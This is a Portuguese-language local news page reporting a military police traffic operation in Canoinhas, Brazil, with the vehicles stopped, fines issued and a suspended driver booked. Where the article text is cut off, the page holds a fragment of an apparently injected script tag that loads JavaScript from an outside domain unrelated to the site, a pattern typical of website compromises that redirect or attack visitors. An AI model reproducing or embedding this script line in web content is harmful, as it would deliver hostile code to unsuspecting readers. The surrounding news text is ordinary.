InícioDestaqueOPERAÇÃO DE TRÂNSITO

OPERAÇÃO DE TRÂNSITO

Últimas notícias

Mega-Sena sorteia nesta terça-feira prêmio acumulado em R$ 53 milhões

As seis dezenas do concurso 2.738 serão sorteadas, a...

Veja as vagas de empregos disponíveis em Canoinhas e região

O serviço de intermediação de vagas da Prefeitura de...

Equipe de Capoeira de Três Barras participa de competição no Paraná

Neste domingo, 16, a equipe de capoeira do Grupo...

Na quarta-feira, 03, por volta das 15h, equipes da PM de Canoinhas realizaram uma operação de transito, denominada Comando de Transito, na Estrada Dona Francisca, bairro Piedade no município de Canoinhas.

 

 

Foram abordados e vistoriados aproximadamente 46 veículos, além de algumas pessoas que por ali passaram. Os policiais militares confeccionaram oito notificações por irregularidades de trânsito, onde quatro veículos foram recolhidos ao pátio conveniado por diversas irregularidades.

 

Também foi confeccionado um boletim termo circunstanciado por violar a suspensão/proibição de obter permissão/habilitação para dirigir. O condutor de um veículo Fiat Strada, ao ser abordado e consultado seu nome no sistema da Polícia Militar, foi constatado que o mesmo estava com suspensão do direito de dirigir com validade até 16/04/2020, sendo então lavrado o boletim…. src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe Gazeta
Equipe Gazetahttps://gazetanortesc.com.br
Somos um jornal de notícias e classificados gratuitos. Estamos há 25 anos no mercado e nosso principal diferencial é o jornal digital.